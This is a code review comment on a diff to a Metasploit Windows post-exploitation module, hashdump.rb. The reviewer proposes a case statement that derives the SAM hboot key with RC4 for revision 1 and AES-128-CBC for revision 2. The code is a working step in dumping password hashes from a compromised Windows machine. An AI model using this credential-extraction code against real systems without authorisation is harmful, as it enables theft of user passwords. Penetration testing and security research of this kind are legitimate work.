modules/post/windows/gather/hashdump.rb

```diff
@@ -139,14 +139,29 @@ def capture_hboot_key(bootkey)
     vf = vf.data
     ok.close
 
-    hash = Digest::MD5.new
-    hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)
-
-    rc4 = OpenSSL::Cipher.new("rc4")
-    rc4.key = hash.digest
-    hbootkey  = rc4.update(vf[0x80, 32])
-    hbootkey << rc4.final
-    return hbootkey
+    revision = vf[0x68, 4].unpack('V')[0]
+
+    if revision == 1
```

Comment:
This would be better handled with a case statement, and then get rid of the explicit returns

Like this:
```ruby
case revision
      when 1
        hash = Digest::MD5.new
        hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)

        rc4 = OpenSSL::Cipher.new("rc4")
        rc4.key = hash.digest
        hbootkey  = rc4.update(vf[0x80, 32])
        hbootkey << rc4.final
        hbootkey  
      when 2
        aes = OpenSSL::Cipher.new('aes-128-cbc')
        aes.key = bootkey
        aes.padding = 0
        aes.decrypt
        aes.iv = vf[0x78, 16]
        aes.update(vf[0x88, 16]) # we need only 16 bytes
      else
        raise NotImplementedError, "Unknown hboot_key revision: #{revision}"  
    end
```